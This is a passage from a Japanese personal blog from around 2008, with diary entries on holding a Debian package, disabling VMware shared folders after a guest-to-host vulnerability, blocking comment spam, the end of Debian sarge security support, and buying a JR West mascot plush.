# echo gs-esp hold | dpkg --set-selections 
を実行して、パッケージをホールドしておくといいでしょう。
  
ただし、将来的にgsの独自パッケージがセキュリティ対応で
アップデートされたのであれば
# echo gs-esp install | dpkg --set-selections 
でホールド解除して、アップデートしてやる必要があります。
  
もしくは、aptitudeしか使わないのであれば
# aptitude hold gs-esp　　　でホールド
# aptitude unhold gs-esp     でホールド解除
することもできます
  
□ 参考
Debian スレッドテンプレ - 特定のパッケージをアップグレードの対象から外したい
http://debian.fam.cx/index.php?AptGet#ma5c1389
OpenPrinting - ベクタープリンタドライバのインストール
http://opfc.sourceforge.jp/debian.html

_ [PC] VMwareでゲストOSからホストOSにアクセスできる脆弱性

対象となる製品は、Windowsホスト上のVMware Workstation/Player/ACEで、VMware Server/ESX Serverは含まれません。この脆弱性は、VMwareの機能のshared folder(共有フォルダ)に関するもので、共有フォルダが有効かつフォルダ指定を行っている場合に、影響があるようです。

また、VMware Workstation6やVmware Player 2では、デフォルトで共有フォルダが無効になっているので影響は少ないでしょうが、VMware Workstation5やVmware Player 1ではデフォルトで有効になっているようなので、フォルダ指定を行っている場合は要チェックです。回避策としては、下記を参照してください。

ITPro - VMwareにぜい弱性，ゲストOSからホストOSにアクセス可能に
http://itpro.nikkeibp.co.jp/article/NEWS/20080226/294827/
VMware - Critical VMware Security Alert for Windows-Hosted VMware Workstation, VMware Player, and VMware ACE
http://kb.vmware.com/selfservice/microsites/search.do?language=en_US&cmd=displayKC&externalId=1004034
  
□ 今回のVMwareの脆弱性の回避策
---------------------------------------------------------------------
共有フォルダを全般的に無効にする:
   1.メニューから「編集」→「環境設定」を選択。
   2.ワークスペースタブを開いて、「デフォルトですべての共有フォルダを有効にする」の
     チェックを外す。
  
仮想環境で個別に無効にする:
   1.メニューから「VM」→「設定」を選択。
   2.オプションタブを開いて、共有フォルダの設定を「無効」にする。
---------------------------------------------------------------------
  

_ [その他] コメントspamに気づかず

tdiary 2.2に移行して、従来のspamフィルタリング+特定語句方式から、spamフィルタにおまかせで試したままにしていたら、1個のみのURLを含んだコメントspamが投稿されてしまっていました。しかも、コメントメールの送信がうまくいってないので、しばらく気づかなかったし...orz。

対策として、hrefを含むコメントはすべて拒否することで、リンクを貼らせないようにしてみました。また、NGワードリストも復活。これでたいがい大丈夫だとは思います。日本語などの2バイト文字を含まない投稿をすべて拒否すれば、効果は高いんですが、過去に他の言語圏などから投稿できなかった可能性もあるので、今回は見送りに。

さて、ということでコメントを隠すだけなのはアレなので、tdiaryのデータフォルダから、2005/200503.tdcファイルを編集して、cache以下のファイルを削除してリロードで消しました。

追記:ついでにRSSの見直しで記事全文を含めずに、比較的短い形のエントリにしてみました。しかし、RSSリーダで全文読めて完結したほうがいい or RSSリーダはインデックス的に使っているので短いほうがいい、とでは、どっちを好む人が多いんでしょうか。

_ [Linux] Debian sargeのセキュリティーアップデート終了

2007年4月8日にリリースされたEtchの登場から、約1年がたつのでセキュリティアップデートは2008年3月31日で終了とのこと。potatoやwoody時代からすると、新たな視野を開かせてくれたバージョンでした。感謝とともに、セキュリティアップデートのリリース終了を迎えます。

debian.org - Security Support for Debian 3.1 to be terminated
http://www.debian.org/News/2008/20080229

_ [鉄道] JR西日本イコちゃんぬいぐるみ発売

イコちゃんぬいぐるみは、以前、ICOCA利用者100万人記念で限定2000個でぬいぐるみを販売していましたが、今回はそのとき(1890円)よりも安く1200円で発売するようです。また、J-WESTカードのキャンペーンとかでも1000個単位で、ちょこちょこプレゼントに出していたようなので、量産体制に入ってグッズを売る気まんまんなのでしょうか。個人的には大歓迎です。

そういえば、下記のJR西日本プレスリリースでも "さらに4月から、携帯グッズ、ボールペンなどの文房具や、パスカードケース、エコバックなど幅広く商品展開していきます。イコちゃんファンのみなさまどうぞご期待ください。" だそうなので、ようやくグッズとかの商品展開が本格的に進むようです。楽しみー。限定といわず、欲しいときに買えるくらいの数が出ていれば、ファンのみならず一般の人間にも多く売れると思うんですが。JR系のキャラクターの中では一番愛嬌があってかわいいキャラクターだと思います。

個人的にはエコバッグが出たら、ぜひ欲しい！ということで、まずは前段階のつもりで、オンラインショップでイコちゃんぬいぐるみをポチってしまいました。

追記: 購入したものが届いたときの日記はこちらで。相変わらずかわいい。

JR西日本 - ＪＲ西日本『カモノハシのイコちゃん　ぬいぐるみ』の販売について
http://www.westjr.co.jp/news/newslist/article/1173560_799.html
JR西日本商事 トレインボックス - カモノハシのイコちゃん　ぬいぐるみ
http://www.jrwtrading.jp/trainbox/ic_2100363.html